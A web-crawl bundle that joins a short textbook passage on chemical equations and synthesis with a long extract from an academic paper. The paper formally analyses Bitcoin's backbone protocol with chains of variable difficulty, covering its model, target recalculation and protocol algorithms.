{"ft_lang_label":"__label__en","ft_lang_prob":0.9110437,"math_prob":0.99210703,"size":2013,"snap":"2020-45-2020-50","text_gpt3_token_len":406,"char_repetition_ratio":0.13439523,"word_repetition_ratio":0.01179941,"special_character_ratio":0.19274715,"punctuation_ratio":0.094986804,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99858737,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T00:34:19Z\",\"WARC-Record-ID\":\"<urn:uuid:bb10dec2-d02e-4bd2-946a-67e346920969>\",\"Content-Length\":\"94243\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:403a7be9-24e8-4560-87bc-cdae77004361>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb368fa1-4013-4fcc-b9cf-9d1bb57bc98f>\",\"WARC-IP-Address\":\"52.26.36.19\",\"WARC-Target-URI\":\"https://deepai.org/machine-learning-glossary-and-terms/ordinary-least-squares\",\"WARC-Payload-Digest\":\"sha1:GPAYTKAFFDWVQXTJQFLHFMJLYDEVIHFJ\",\"WARC-Block-Digest\":\"sha1:VMMSIN2OAT3I5DMWTZELKX2SA7PIWSX3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107892710.59_warc_CC-MAIN-20201026234045-20201027024045-00496.warc.gz\"}"}
https://chestofbooks.com/crafts/metal/Applied-Science-Metal-Workers/135-Synthesis.html
[ "As already stated, when the proper proportions by weight of oxygen and hydrogen are mixed and a spark passed through, water is formed. This change, often called a reaction, may be written as follows:\n\n 2H + O = H1O 2 atoms of hydrogen combined with 1 atom of oxygen forms 1 molecule of water\n\nAbbreviating a reaction in this manner is called writing a chemical equation. In a very concise form it shows: on the left-hand side of the equation the substances (called factors) which enter the reaction, on the right-hand side the products, and also the exact amount of each that must be taken or formed. Once the products are determined (usually by experiments), the equation may be written and balanced by having the same number of atoms of the elements on each side of the equation. Forming compounds by combining elements is called synthesis." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95175576,"math_prob":0.98695385,"size":1006,"snap":"2019-35-2019-39","text_gpt3_token_len":214,"char_repetition_ratio":0.10878243,"word_repetition_ratio":0.0,"special_character_ratio":0.20576541,"punctuation_ratio":0.104166664,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95560867,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-23T19:43:23Z\",\"WARC-Record-ID\":\"<urn:uuid:42e55e58-854b-4f7b-ba98-952d77207acc>\",\"Content-Length\":\"16517\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:611db64f-f458-4ee8-b41a-c9675c53f007>\",\"WARC-Concurrent-To\":\"<urn:uuid:66326753-ee04-4b51-ba8b-d485feb70afe>\",\"WARC-IP-Address\":\"208.70.246.108\",\"WARC-Target-URI\":\"https://chestofbooks.com/crafts/metal/Applied-Science-Metal-Workers/135-Synthesis.html\",\"WARC-Payload-Digest\":\"sha1:ZFJYH4JMWZGHKRQ6HDOCSHUPRXKBOUEA\",\"WARC-Block-Digest\":\"sha1:SEARHV35B6E3E7R5ZLTUY56JOPNJZCPG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027318986.84_warc_CC-MAIN-20190823192831-20190823214831-00178.warc.gz\"}"}
https://link.springer.com/chapter/10.1007/978-3-319-63688-7_10
[ "# The Bitcoin Backbone Protocol with Chains of Variable Difficulty\n\nConference paper\nPart of the Lecture Notes in Computer Science book series (LNCS, volume 10401)\n\n## Abstract\n\nBitcoin’s innovative and distributedly maintained blockchain data structure hinges on the adequate degree of difficulty of so-called “proofs of work,” which miners have to produce in order for transactions to be inserted. Importantly, these proofs of work have to be hard enough so that miners have an opportunity to unify their views in the presence of an adversary who interferes but has bounded computational power, but easy enough to be solvable regularly and enable the miners to make progress. As such, as the miners’ population evolves over time, so should the difficulty of these proofs. Bitcoin provides this adjustment mechanism, with empirical evidence of a constant block generation rate against such population changes.\n\nIn this paper we provide the first formal analysis of Bitcoin’s target (re)calculation function in the cryptographic setting, i.e., against all possible adversaries aiming to subvert the protocol’s properties. We extend the q-bounded synchronous model of the Bitcoin backbone protocol [Eurocrypt 2015], which posed the basic properties of Bitcoin’s underlying blockchain data structure and shows how a robust public transaction ledger can be built on top of them, to environments that may introduce or suspend parties in each round.\n\nWe provide a set of necessary conditions with respect to the way the population evolves under which the “Bitcoin backbone with chains of variable difficulty” provides a robust transaction ledger in the presence of an actively malicious adversary controlling a fraction of the miners strictly below $$50\\%$$ at each instant of the execution. Our work introduces new analysis techniques and tools to the area of blockchain systems that may prove useful in analyzing other blockchain protocols.\n\n## 1 Introduction\n\nThe Bitcoin backbone  extracts and analyzes the basic properties of Bitcoin’s underlying blockchain data structure, such as “common prefix” and “chain quality,” which parties (“miners”) maintain and try to extend by generating “proofs of work” (POW, aka “cryptographic puzzles” [1, 8, 14, 23])1. It is then formally shown in  how fundamental applications including consensus [17, 22] and a robust public transaction ledger realizing a decentralized cryptocurrency (e.g., Bitcoin ) can be built on top of them, assuming that the hashing power of an adversary controlling a fraction of the parties is strictly less than 1/2.\n\nThe results in , however, hold for a static setting, where the protocol is executed by a fixed number of parties (albeit not necessarily known to the participants), and therefore with POWs (and hence blockchains) of fixed difficulty. This is in contrast to the actual deployment of the Bitcoin protocol where a “target (re)calculation” mechanism adjusts the hardness level of POWs as the number of parties varies during the protocol execution. In more detail, in  the target T that the hash function output must not exceed, is set and hardcoded at the beginning of the protocol, and in such a way that a specific relation to the number of parties running the protocol is satisfied, namely, that a ratio f roughly equal to $$q n T/2^{\\kappa }$$ is small, where q is the number of queries to the hash function that each party is allowed per round, n is the number of parties, and $$\\kappa$$ is the length of the hash function output. 
Security was only proven when the number of parties is n and the choice of target T is never recalculated, thus leaving open the question of the full analysis of the protocol in a setting where, as in the real world, parties change dynamically over time.\n\nIn this paper, we abstract for the first time the target recalculation algorithm from the Bitcoin system, and present a generalization and analysis of the Bitcoin backbone protocol with chains of variable difficulty, as produced by an evolving population of parties, thus answering the aforementioned open question.\n\nIn this setting, there is a parameter m which determines the length of an “epoch” in number of blocks.2 When a party prepares to compute the j-th block of a chain with $$j \bmod m = 1$$, it uses a target calculation algorithm that determines the proper target value to use, based on the party’s local view about the total number of parties that are present in the system, as reflected by the rate of blocks that have been created so far and are part of the party’s chain. (Each block contains a timestamp of when it was created; in our synchronous setting, timestamps will correspond to the round numbers when blocks are created—see Sect. 2.) To accommodate the evolving population of parties, we extend the model of  to environments that are free to introduce and suspend parties in each round. In other respects, we follow the model of , where all parties have the same “hashing power,” with each one allowed to pose q queries to the hash function that is modeled as a “random oracle” . We refer to our setting as the dynamic q -bounded synchronous setting.\n\nIn order to give an idea of the issues involved, we note that without a target calculation mechanism, in the dynamic setting the backbone protocol is not secure even if all parties are honest and follow the protocol faithfully. Indeed, it is easy to see that a combination of an environment that increases the number of parties and adversarial network conditions can lead to substantial divergence (a.k.a. “forks”) in the chains of the honest parties, leading to the violation of the agreement-type properties that are needed for the applications of the protocol, such as maintaining a robust transaction ledger. The attack is simple: the environment increases the number of parties constantly so that the block production rate per round increases (which is roughly the parameter f mentioned above); then, adversarial network conditions may divide the parties into two sets, A and B, and schedule message delivery so that parties in set A receive blocks produced by parties in A first, and similarly for set B. According to the Bitcoin protocol, parties adopt the block they see first, and thus the two sets will maintain two separate blockchains.\n\nWhile this specific attack could in principle be thwarted by modifying the Bitcoin backbone (e.g., by randomizing which block a party adopts when they receive in the same round two blocks of the same index in the chain), it certainly would not cope with all possible attacks in the presence of a full-blown adversary and target recalculation mechanism. 
Indeed, such an attack was shown in , where by mining “privately” with timestamps in rapid succession, corrupt miners are able to induce artificially high targets in their private chain; even though such chain may grow slower than the main chain, it will still make progress and, via an anti-concentration argument, a sudden adversarial advance that can break agreement amongst honest parties cannot be ruled out.\n\nGiven the above, our main goal is to show that the backbone protocol with a Bitcoin-like target recalculation function satisfies the common prefix and chain quality properties, as an intermediate step towards proving that the protocol implements a robust transaction ledger. Expectedly, the class of protocols we will analyze will not preserve its properties for arbitrary ways in which the number of parties may change over time. In order to bound the error in the calibration of the block generation rate that the target recalculation function attempts, we will need some bounds on the way the number of parties may vary. For $$\\gamma \\in \\mathbb {R}^+$$ and $$s\\in \\mathbb {N}$$, we will call a sequence $$(n_r)_{r \\in \\mathbb {N}}$$ of parties $$(\\gamma ,s)$$ -respecting if it holds that in a sequence of rounds S with $$|S|\\le s$$, $$\\max _{r\\in S} n_r \\le \\gamma \\cdot \\min _{r\\in S} n_r$$, and will determine for what values of these parameters the backbone protocol is secure.\n\nAfter formally describing blockchains of variable difficulty and the Bitcoin backbone protocol in this setting, at a high level our analysis goes as follows. We first introduce the notion of goodness regarding the approximation that is performed on f in an epoch. In more detail, we call a round r $$(\\eta ,\\theta )$$ -good, for some parameters $$\\eta ,\\theta \\in \\mathbb {R}^+$$, if the value $$f_r$$ computed for the actual number of parties and target used in round r by some honest party, falls in the range $$[\\eta f, \\theta f]$$, where f is the initial block production rate (note that the first round is always assumed good). Together with “goodness” we introduce the notion of typical executions, in which, informally, for any set S of consecutive rounds the successes of the adversary and the honest parties do not deviate too much from their expectations as well as no “bad” event concerning the hash function occurs (such as a collision). Using a martingale bound we demonstrate that almost all polynomially bounded (in $$\\kappa$$) executions are typical.\n\nNext, we proceed to show that in a typical execution any chain that an honest party adopts (1) contains timestamps that are approximately accurate (i.e., no adversarial block has a timestamp that differs too much from its real creation time), and (2) it has a target such that the probability of block production remains near the fixed constant f, i.e., it is “good.” Finally, these properties allow us to demonstrate that a typical execution enjoys the common prefix and chain quality properties, which is a stepping stone towards the ultimate goal, that of establishing that the backbone protocol with variable difficulty implements a robust transaction ledger. Specifically, we show the following:\n\nMain Result. (Informal—see Theorems 4 and 5). 
The Bitcoin backbone protocol with chains of variable difficulty, suitably parameterized, satisfies with overwhelming probability in m and $$\kappa$$ the properties of (1) persistence—if a transaction $$tx$$ is confirmed by an honest party, no honest party will ever disagree about the position of $$tx$$ in the ledger, and (2) liveness—if a transaction $$tx$$ is broadcast, it will eventually become confirmed by all honest parties.\n\nRemark. Regarding the actual parameterization of the Bitcoin system (that uses epochs of $$m=2016$$ blocks), even though it is consistent with all the constraints of our theorems (cf. Remark 3 in Sect. 6.1), it cannot be justified by our martingale analysis. In fact, our probabilistic analysis would require much longer epochs to provide a sufficiently small probability of attack. Tightening the analysis or discovering attacks for parameterizations beyond our security theorems is an interesting open question.\n\nFinally, we note that various extensions to our model are relevant to the Bitcoin system and constitute interesting directions for further research. Important examples are a security analysis in the “rational” setting (see, e.g., [9, 15, 24]), and one in the “partially synchronous,” or “bounded-delay” network model [7, 21]3.\n\n## 2 Model and Definitions\n\nWe describe our protocols in a model that extends the synchronous communication network model presented in [10, 11] for the analysis of the Bitcoin backbone protocol in the static setting with a fixed number of parties (which in turn is based on Canetti’s formulation of “real world” notion of protocol execution [4, 5, 6] for multi-party protocols) to the dynamic setting with a varying number of parties. In this section we provide a high-level overview of the model, highlighting the differences that are intrinsic to our dynamic setting.\n\nRound Structure and Protocol Execution. As in , the protocol execution proceeds in rounds with inputs provided by an environment program denoted by $$\mathcal {Z}$$ to parties that execute the protocol $$\varPi$$, and our adversarial model in the network is “adaptive,” meaning that the adversary $$\mathcal {A}$$ is allowed to take control of parties on the fly, and “rushing,” meaning that in any given round the adversary gets to see all honest players’ messages before deciding his strategy. The parties’ access to the hash function and their communication mechanism are captured by a joint random oracle/diffusion functionality which reflects Bitcoin’s peer structure. The diffusion functionality, , allows the order of messages to be controlled by $$\mathcal {A}$$, i.e., there are no atomicity guarantees in message broadcast , and, furthermore, the adversary is allowed to spoof the source information on every message (i.e., communication is not authenticated). Still, the adversary cannot change the contents of the messages nor prevent them from being delivered. We will use Diffuse as the message transmission command that captures this “send-to-all” functionality.\n\nThe parties that may become active in a protocol execution are encoded as part of a control program C and come from a universe $$\mathcal {U}$$ of parties.\n\nThe protocol execution is driven by an environment program $$\mathcal {Z}$$ that interacts with other instances of programs that it spawns at the discretion of the control program C. The pair $$(\mathcal {Z}, C)$$ forms a system of interactive Turing machines (ITM’s) in the sense of . 
The execution is with respect to a program $$\varPi$$, an adversary $$\mathcal {A}$$ (which is another ITM) and the universe of parties $$\mathcal {U}$$. Assuming the control program C allows it, the environment $$\mathcal {Z}$$ can activate a party by writing to its input tape. Note that the environment $$\mathcal {Z}$$ also receives the parties’ outputs when they are produced in a standard subroutine-like interaction. Additionally, the control program maintains a flag for each instance of an ITM, (abbreviated as ITI in the terminology of ), that is called the $$\mathtt {ready}$$ flag and is initially set to false for all parties.\n\nThe environment $$\mathcal {Z}$$ is initially restricted by C to spawn the adversary $$\mathcal {A}$$. Each time the adversary is activated, it may send one or more messages of the form $$(\mathsf {Corrupt}, P_i)$$ to C and C will mark the corresponding party as corrupted.\n\nFunctionalities Available to the Protocol. The ITI’s of protocol $$\varPi$$ will have access to a joint ideal functionality capturing the random oracle and the diffusion mechanism which is defined in a similar way as and is explained below.\n\n• The random oracle functionality. Given a query with a value x marked for “calculation” for the function $$H(\cdot )$$ from an honest party $$P_i$$ and assuming x has not been queried before, the functionality returns a value y which is selected at random from $$\{0,1\}^\kappa$$; furthermore, it stores the pair (x, y) in the table of $$H(\cdot )$$, in case the same value x is queried in the future. Each honest party $$P_i$$ is allowed to ask q queries in each round as determined by the diffusion functionality (see below). On the other hand, each honest party is given unlimited queries for “verification” for the function $$H(\cdot )$$. The adversary $$\mathcal {A}$$, on the other hand, is given a bounded number of queries in each round as determined by the diffusion functionality with a bound that is initialized to 0 and determined as follows: whenever a corrupted party is activated, the party can ask the bound to be increased by q; each time a query is asked by the adversary the bound is decreased by 1. No verification queries are provided to $$\mathcal {A}$$. Note that the value q is a polynomial function of $$\kappa$$, the security parameter. The functionality can maintain tables for functions other than $$H(\cdot )$$ but, by convention, the functionality will impose query quotas on function $$H(\cdot )$$ only.\n\n• The diffusion functionality. This functionality keeps track of rounds in the protocol execution; for this purpose it initially sets a variable round to be 1. It also maintains a Receive() string defined for each party $$P_i$$ in $$\mathcal {U}$$. A party that is activated is allowed to query the functionality and fetch the contents of its personal Receive() string. Moreover, when the functionality receives a message $$(\mathsf {Diffuse}, m)$$ from party $$P_i$$ it records the message m. A party $$P_i$$ can signal when it is complete for the round by sending a special message $$(\mathsf {RoundComplete})$$. With respect to the adversary $$\mathcal {A}$$, the functionality allows it to receive the contents of all $$\mathsf {Diffuse}$$ messages for the round and to specify the contents of the Receive() string for each party $$P_i$$. The adversary has to specify when it is complete for the current round. 
When all parties are complete for the current round, the functionality inspects the contents of all Receive() strings and includes any messages m that were diffused by the parties in the current round but not contributed by the adversary to the Receive() tapes (in this way guaranteeing message delivery). It also flushes any old messages that were diffused in previous rounds and not diffused again. The variable round is then incremented.\n\nThe Dynamic $${\\varvec{q}}$$ -Bounded Synchronous Setting. Consider $$\\mathbf {n} = \\{n_r\\}_{r\\in \\mathbb {N}}$$ and $$\\mathbf {t} = \\{t_r\\}_{r\\in \\mathbb {N}}$$ two series of natural numbers. As mentioned, the first instance that is spawned by $$\\mathcal {Z}$$ is the adversary $$\\mathcal {A}$$. Subsequently the environment may spawn (or activate if they are already spawned) parties $$P_i\\in \\mathcal {U}$$. The control program maintains a counter in each sequence of activations and matches it with the current round that is maintained by the diffusion functionality. Each time an honest party diffuses a message containing the label “$$\\mathtt {ready}$$” the control program C increases the ready counter for the round. In round r, the control program C will enable the adversary $$\\mathcal {A}$$ to complete the round, only provided that (i) exactly $$n_r$$ parties have transmitted $$\\mathtt {ready}$$ message, (ii) the number of (“corrupt”) parties controlled by $$\\mathcal {A}$$ should match $$t_r$$.\n\nParties, when activated, are able to read their input tape $$\\mathrm{I}\\textsc {nput}()$$ and communication tape $$\\mathrm{R}\\textsc {eceive}()$$ from the diffusion functionality. Observe that parties are unaware of the set of activated parties. The Bitcoin backbone protocol requires from parties (miners) to calculate a POW. This is modeled in as parties having access to the oracle $$H(\\cdot )$$. The fact that (active) parties have limited ability to produce such POWs, is captured as in  by the random oracle functionality and the fact that it paces parties to query a limited number of queries per round. The bound, q, is a function of the security parameter $$\\kappa$$; in this sense the parties may be called q-bounded4. We refer to the above restrictions on the environment, the parties and the adversary as the dynamic q -bounded synchronous setting.\n\nThe term $$\\{\\textsc {view} ^{P, \\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}(z)\\}_{z\\in \\{0,1\\}^*}$$ denotes the random variable ensemble describing the view of party P after the completion of an execution running protocol $$\\varPi$$ with environment $$\\mathcal {Z}$$ and adversary $$\\mathcal {A}$$, on input $$z\\in \\{0,1\\}^*$$. We will only consider a “standalone” execution without any auxiliary information and we will thus restrict ourselves to executions with $$z = 1^\\kappa$$. For this reason we will simply refer to the ensemble by $$\\textsc {view} ^{P,\\mathbf {t},\\mathbf {n}}_{\\varPi ,\\mathcal {A},\\mathcal {Z}}$$. The concatenation of the view of all parties ever activated in the execution is denoted by $$\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$.\n\nProperties of Protocols. In our theorems we will be concerned with properties of protocols $$\\varPi$$ running in the above setting. 
Such properties will be defined as predicates over the random variable $$\\textsc {view} ^{ \\mathbf {t},\\mathbf {n} }_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$ by quantifying over all possible adversaries $$\\mathcal {A}$$ and environments $$\\mathcal {Z}$$. Note that all our protocols will only satisfy properties with a small probability of error in $$\\kappa$$ as well as in a parameter k that is selected from $$\\{1,\\ldots ,\\kappa \\}$$ (with foresight we note that in practice would be able to choose k to be much smaller than $$\\kappa$$, e.g., $$k=6$$).\n\nThe protocol class that we will analyze will not be able to preserve its properties for arbitrary sequences of parties. To restrict the way the sequence $$\\mathbf {n}$$ is fluctuating we will introduce the following class of sequences.\n\n### Definition 1\n\nFor $$\\gamma \\in \\mathbb {R}^+$$, we call a sequence $$(n_r)_{r \\in \\mathbb {N}}$$ $$(\\gamma ,s)$$ -respecting if for any set S of at most s consecutive rounds, $$\\max _{r\\in S} n_r \\le \\gamma \\cdot \\min _{r\\in S} n_r$$.\n\nObserve that the above definition is fairly general and also can capture exponential growth; e.g., by setting $$\\gamma =2$$ and $$s=10$$, it follows that every 10 rounds the number of ready parties may double. Note that this will not lead to an exponential running time overall since the total run time is bounded by a polynomial in $$\\kappa$$, (due to the fact that $$(\\mathcal {Z}, C)$$ is a system of ITM’s, $$\\mathcal {Z}$$ is locally polynomial bounded, C is a polynomial-time program, and thus [5, Proposition 3] applies).\n\nMore formally, a protocol $$\\varPi$$ would satisfy a property Q for a certain class of sequences $$\\mathbf {n}, \\mathbf {t}$$, provided that for all PPT $$\\mathcal {A}$$ and locally polynomial bounded $$\\mathcal {Z}$$, it holds that $$Q(\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}})$$ is true with overwhelming probability of the coins of $$\\mathcal {A},\\mathcal {Z}$$ and the random oracle functionality.\n\nIn this paper, we will be interested in $$(\\gamma , s)$$-respecting sequences $$\\mathbf {n}$$, sequences $$\\mathbf {t}$$ suitably restricted by $$\\mathbf {n}$$, and protocols $$\\varPi$$ suitably parameterized given $$\\mathbf {n}, \\mathbf {t}$$.\n\n## 3 Blockchains of Variable Difficulty\n\nWe start by introducing blockchain notation; we use similar notation to , and expand the notion of blockchain to explicitly include timestamps (in the form of a round indicator). Let $$G(\\cdot )$$ and $$H(\\cdot )$$ be cryptographic hash functions with output in $$\\{0,1\\}^\\kappa$$. A block with target $$T \\in \\mathbb {N}$$ is a quadruple of the form $$B=\\langle r, st, x, ctr\\rangle$$ where $$st\\in \\{0,1\\}^\\kappa , x \\in \\{0,1\\}^*$$, and $$r,ctr\\in \\mathbb {N}$$ are such that they satisfy the predicate $$\\mathsf {validblock}^T_q(B)$$ defined as\n\\begin{aligned} ( H( ctr, G(r, st, x)) < T ) \\wedge (ctr\\le q). \\end{aligned}\nThe parameter $$q \\in \\mathbb {N}$$ is a bound that in the Bitcoin implementation determines the size of the register ctr; as in , in our treatment we allow q to be arbitrary, and use it to denote the maximum allowed number of hash queries in a round (cf. Sect. 2). We do this for convenience and our analysis applies in a straightforward manner to the case that ctr is restricted to the range $$0 \\le ctr <2^{32}$$ and q is independent of ctr.\n\nA blockchain, or simply a chain is a sequence of blocks. 
The rightmost block is the head of the chain, denoted $$\\mathrm {head}(\\mathcal {C})$$. Note that the empty string $$\\varepsilon$$ is also a chain; by convention we set $$\\mathrm {head}(\\varepsilon ) = \\varepsilon$$. A chain $$\\mathcal {C}$$ with $$\\mathrm {head}(\\mathcal {C}) = \\langle r, st,x,ctr\\rangle$$ can be extended to a longer chain by appending a valid block $$B = \\langle r', st', x', ctr' \\rangle$$ that satisfies $$st' = H( ctr, G(r , st,x) )$$ and $$r'>r$$, where $$r'$$ is called the timestamp of block B. In case $$\\mathcal {C}=\\varepsilon$$, by convention any valid block of the form $$\\langle r', st',x', ctr'\\rangle$$ may extend it. In either case we have an extended chain $$\\mathcal {C}_\\mathsf {new} = \\mathcal {C}B$$ that satisfies $$\\mathrm {head}(\\mathcal {C}_\\mathsf {new}) = B$$.\n\nThe length of a chain $$\\mathop {\\mathrm {len}}(\\mathcal {C})$$ is its number of blocks. Consider a chain $$\\mathcal {C}$$ of length $$\\ell$$ and any nonnegative integer k. We denote by $$\\mathcal {C}^{\\lceil k}$$ the chain resulting from “pruning” the k rightmost blocks. Note that for $$k\\ge \\mathop {\\mathrm {len}}(\\mathcal {C})$$, $$\\mathcal {C}^{\\lceil k}=\\varepsilon$$. If $$\\mathcal {C}_1$$ is a prefix of $$\\mathcal {C}_2$$ we write $$\\mathcal {C}_1 \\preceq \\mathcal {C}_2$$.\n\nGiven a chain $$\\mathcal {C}$$ of length $$\\mathop {\\mathrm {len}}(\\mathcal {C}) = \\ell$$, we let $$\\mathbf x_\\mathcal {C}$$ denote the vector of $$\\ell$$ values that is stored in $$\\mathcal {C}$$ and starts with the value of the first block. Similarly, $$\\mathbf r_\\mathcal {C}$$ is the vector that contains the timestamps of the blockchain $$\\mathcal {C}$$.\n\nFor a chain of variable difficulty, the target T is recalculated for each block based on the round timestamps of the previous blocks. Specifically, there is a function $$D: \\mathbb {Z}^* \\rightarrow \\mathbb {R}$$ which receives an arbitrary vector of round timestamps and produces the next target. The value $$D(\\varepsilon )$$ is the initial target of the system. The difficulty of each block is measured in terms of how many times the block is harder to obtain than a block of target $$T_0$$. In more detail, the difficulty of a block with target T is equal to $$T_0/T$$; without loss of generality we will adopt the simpler expression 1 / T (as $$T_0$$ will be a constant across all executions). We will use $$\\mathrm {diff}(\\mathcal {C})$$ to denote the difficulty of a chain. This is equal to the sum of the difficulties of all the blocks that comprise the chain.\n\nThe Target Calculation Function. Intuitively, the target calculation function $$D(\\cdot )$$ aims at maintaining the block production rate constant. It is parameterized by $$m\\in \\mathbb {N}$$ and $$f\\in (0,1)$$; Its goal is that m blocks will be produced every m / f rounds. We will see in Sect. 6 that the probability f(Tn) with which n parties produce a new block with target T is approximated by\n\\begin{aligned} f(T,n)\\approx \\frac{qTn}{2^\\kappa }. \\end{aligned}\n(Note that $$T/2^{\\kappa }$$ is the probability that a single player produces a block in a single query.)\nTo achieve the above goal Bitcoin tries to keep $${qTn}/{2^\\kappa }$$ close to f. To that end, Bitcoin waits for m blocks to be produced and based on their difficulty and how fast these blocks were computed it computes the next target. More specifically, say the last m blocks of a chain $$\\mathcal {C}$$ are for target T and were produced in $$\\varDelta$$ rounds. 
Consider the case where a number of players\n\\begin{aligned} n(T,\\varDelta )=\\frac{2^\\kappa m}{qT\\varDelta } \\end{aligned}\nattempts to produce m blocks of target T; note that it will take them approximately $$\\varDelta$$ rounds in expectation. Intuitively, the number of players at the point when m blocks were produced is estimated by $$n(T,\\varDelta )$$; then the next target $$T'$$ is set so that $$n(T,\\varDelta )$$ players would need m / f rounds in expectation to produce m blocks of target $$T'$$. Therefore, it makes sense to set\n\\begin{aligned} T'=\\frac{\\varDelta }{m/f}\\cdot T, \\end{aligned}\nbecause if the number of players is indeed $$n(T,\\varDelta )$$ and remains unchanged, it will take them m / f rounds in expectation to produce m blocks. If the initial estimate of the number parties is $$n_0$$, we will assume $$T_0$$ is appropriately set so that $$f\\approx q T_0 n_0/2^\\kappa$$ and then\n\\begin{aligned} T'=\\frac{n_0}{n(T,\\varDelta )}\\cdot T_0. \\end{aligned}\n\n### Remark 1\n\nRecall that in the flat q-bounded setting all parties have the same hashing power (q-queries per round). It follows that $$n_0$$ represents the estimated initial hashing power while $$n(T,\\varDelta )$$ the estimated hashing power during the last m blocks of the chain $$\\mathcal {C}$$. As a result the new target is equal to the initial target $$T_0$$ multiplied by the factor $$n_0/n(T,\\varDelta )$$, reflecting the change of hashing power in the last m blocks.\n\nBased on the above we give the formal definition of the target (re)calculation function, which is as follows.\n\n### Definition 2\n\nFor fixed constants $$\\kappa ,\\tau ,m,n_0,T_0$$, the target calculation function $$D:\\mathbb {Z}^*\\rightarrow \\mathbb {R}$$ is defined as\n$$D(\\varepsilon )=T_0\\quad \\text {and}\\quad D(r_1,\\dots ,r_v)= {\\left\\{ \\begin{array}{ll} \\frac{1}{\\tau }\\cdot T &{}\\hbox {if } \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0<\\frac{1}{\\tau }\\cdot T \\hbox {;}\\\\ \\tau \\cdot T&{}\\hbox {if } \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0>\\tau \\cdot T \\hbox {;}\\\\ \\frac{n_0}{n(T,\\varDelta )}\\cdot T_0&{}\\hbox {otherwise,}\\\\ \\end{array}\\right. }$$\nwhere $$n(T,\\varDelta )=2^\\kappa m /qT\\varDelta$$, with $$\\varDelta =r_{m'}-r_{m'-m}$$, $$T=D(r_1,\\dots ,r_{m'-1})$$, and $$m'={m\\cdot \\lfloor v/m\\rfloor }$$.\n\nIn the definition, $$(r_1,\\dots ,r_v)$$ corresponds to a chain of v blocks with $$r_i$$ the timestamp of the ith block; $$m',\\varDelta ,$$ and T correspond to the last block, duration, and target of the last completed epoch, respectively.\n\n### Remark 2\n\nA remark is in order about the case $$\\frac{n_0}{n(T,\\varDelta )}\\cdot T_0\\notin [\\frac{1}{\\tau }T,\\tau T]$$, since this aspect of the definition is not justified by the discussion preceeding Definition 2. At first there may seem to be no reason to introduce such a “dampening filter” in Bitcoin’s target recalculation function and one should let the parties to try collectively to approximate the proper target. Interestingly, in the absence of such dampening, an efficient attack is known  (against the common-prefix property). 
As we will see, this dampening is sufficient for us to prove security against all attackers, including those considered in (with foresight, we can say that the attack still holds but it will take exponential time to mount).\n\n## 4 The Bitcoin Backbone Protocol with Variable Difficulty\n\nIn this section we give a high-level description of the Bitcoin backbone protocol with chains of variable difficulty; a more detailed description, including the pseudocode of the algorithms, is given in the full version. The presentation is based on the description in . We then formulate two desired properties of the blockchain—common prefix and chain quality—for the dynamic setting.\n\n### 4.1 The Protocol\n\nAs in , in our description of the backbone protocol we intentionally avoid specifying the type of values/content that parties try to insert in the chain, the type of chain validation they perform (beyond checking for its structural properties with respect to the hash functions $$G(\\cdot ),H(\\cdot )$$), and the way they interpret the chain. These checks and operations are handled by the external functions $$V(\\cdot ), I(\\cdot )$$ and $$R(\\cdot )$$ (the content validation function, the input contribution function and the chain reading function, resp.) which are specified by the application that runs “on top” of the backbone protocol. The Bitcoin backbone protocol in the dynamic setting comprises three algorithms.\n\nChain Validation. The $$\\mathsf {validate}$$ algorithm performs a validation of the structural properties of a given chain $$\\mathcal {C}$$. It is given as input the value q, as well as hash functions $$H(\\cdot ), G(\\cdot )$$. It is parameterized by the content validation predicate predicate $$V(\\cdot )$$ as well as by $$D(\\cdot )$$, the target calculation function (Sect. 3). For each block of the chain, the algorithm checks that the proof of work is properly solved (with a target that is suitable as determined by the target calculation function), and that the counter ctr does not exceed q. Furthermore it collects the inputs from all blocks, $${\\mathbf x}_\\mathcal {C}$$, and tests them via the predicate $$V(\\mathbf x_\\mathcal {C})$$. Chains that fail these validation procedure are rejected.\n\nChain Comparison. The objective of the second algorithm, called $$\\mathsf {maxvalid}$$, is to find the “best possible” chain when given a set of chains. The algorithm is straightforward and is parameterized by a $$\\mathsf {max} (\\cdot )$$ function that applies some ordering to the space of blockchains. The most important aspect is the chains’ difficulty in which case $$\\mathsf {max} ( \\mathcal {C}_1, \\mathcal {C}_2 )$$ will return the most difficult of the two. In case $$\\mathrm {diff}(\\mathcal {C}_1) = \\mathrm {diff}(\\mathcal {C}_2)$$, some other characteristic can be used to break the tie. In our case, $$\\mathsf {max} (\\cdot , \\cdot )$$ will always return the first operand to reflect the fact that parties adopt the first chain they obtain from the network.\n\nProof of Work. The third algorithm, called $$\\mathsf {pow}$$, is the proof of work-finding procedure. It takes as input a chain and attempts to extend it via solving a proof of work. This algorithm is parameterized by two hash functions $$H(\\cdot ),G(\\cdot )$$ as well as the parameter q. Moreover, the algorithm calls the target calculation function $$D(\\cdot )$$ in order to determine the value T that will be used for the proof of work. 
